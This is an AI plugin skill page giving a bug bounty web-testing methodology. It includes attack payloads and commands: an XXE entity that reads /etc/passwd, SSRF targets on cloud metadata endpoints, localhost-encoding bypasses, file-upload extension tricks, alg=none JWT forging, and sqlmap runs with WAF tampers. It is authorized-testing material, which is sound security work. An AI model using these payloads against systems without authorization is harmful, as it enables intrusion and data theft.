Stats
Actions
Tags
From cybersec-toolkit
Provides OWASP-aligned bug bounty testing methodology with attack catalog, payload sources, and tool ordering for SQLi, XSS, SSRF, SSTI, IDOR, auth, race conditions, file upload, and deserialization.
How this skill is triggered — by the user, by Claude, or both
Slash command
/cybersec-toolkit:bounty-webThe summary Claude sees in its skill listing — used to decide when to auto-load this skill
Build on top of `bounty-recon` results. Tool-first: use SecLists wordlists (already cloned in this installer) before writing custom payloads.
Build on top of bounty-recon results. Tool-first: use SecLists wordlists (already cloned in this installer) before writing custom payloads.
| Test | How |
|---|---|
| Default creds | hydra, manual common pairs (admin:admin, root:root) |
| User enum (different errors) | manual login form probing |
| Account takeover via password reset | inspect token entropy, host header injection on reset email |
| Session fixation | check if session ID is set before login |
| Session predictability | gather 50+ tokens, run statistical analysis |
| MFA bypass | response manipulation (401→200), brute the OTP, race the verify endpoint |
| Login CSRF | missing CSRF token on /login |
| Logout / impersonation flaws | swap session cookies, replay |
/users/../admin/users.role: user → role: admin, re-sign or use alg=none.turbo-intruder or parallel curl.Methodology: enumerate all endpoints with low-privilege user, then re-request each with no auth, expired token, and other-user token. Diff responses.
# DOM/reflected discovery
dalfox url https://target.com/?q=test
xsstrike -u "https://target.com/?q=FUZZ"
# Stored — manual; create accounts and probe every input field
CSP analysis: parse Content-Security-Policy header — look for unsafe-inline, unsafe-eval, wildcards, exploitable allowlisted CDNs (*.googleapis.com allows JSONP).
sqlmap -u "https://target.com/page?id=1" --batch --level=5 --risk=2 --random-agent
# When WAF blocks
sqlmap ... --tamper=between,space2comment,charencode
169.254.169.254, GCP metadata.google.internal, Azure 169.254.169.254/metadata/instancelocalhost → 127.0.0.1 → 0.0.0.0 → 127.1 → 2130706433 (decimal IP) → DNS rebindinggopherus --exploit mysql/redis/...{{7*7}} → if 49, identify engine, then RCE payload.
<!DOCTYPE foo [<!ENTITY xxe SYSTEM "file:///etc/passwd">]>
<foo>&xxe;</foo>
Try blind XXE with out-of-band exfil (Burp Collaborator, your own server).
These pay the highest because scanners can't find them. Always think:
Examples that have paid 5-figure bounties: race conditions on coupon redemption, integer over/underflow in price/quantity, refund-without-return, IDOR on transaction history.
Always try (in order):
.php/.asp/.jsp uploadfile.php.jpg, file.jpg.php.phtml, .php5, .phar, .phpsfile.php%00.jpgContent-Type: image/jpeg on PHP bodyGIF89a<?php ?>.htaccess upload to remap extensionsDetect: serialized blobs in cookies/parameters (O:8:"User":... PHP, rO0AB... Java, gASV Python pickle, ac ruby).
| Language | Tool |
|---|---|
| Java | ysoserial, marshalsec |
| .NET | ysoserial.net |
| PHP | phpggc |
| Python | manual pickle (__reduce__) |
| Ruby | manual + marshal |
| Node | node-serialize IIFE payload |
Recon: subfinder, httpx, katana, gau, waybackurls
Discovery: ffuf, gobuster, feroxbuster, dirsearch
Scanners: nuclei, nikto, arjun (param mining)
Specific: sqlmap, dalfox, xsstrike, commix, tplmap, jwt_tool
Wordlists: SecLists (cloned), PayloadsAllTheThings (cloned)
Per finding:
Strip credentials from the report. Show that access works, not the credentials themselves.
Use the writeup-template skill for your own records.
npx claudepluginhub 26zl/cybersec-toolkit --plugin cybersec-toolkitGuides authorized black-box/grey-box web application penetration testing following OWASP WSTG methodology. Covers auth bypass, IDOR, session handling, business logic flaws, and parameter tampering.
Guides web application security testing against OWASP Top 10 vulnerabilities including injection, XSS, authentication flaws, and access control issues.
Orchestrates bug bounty sessions: combines 5-phase non-linear workflow with critical thinking (developer psychology, anomaly detection, What-If experiments). Routes to relevant skills. Use at start or when lost.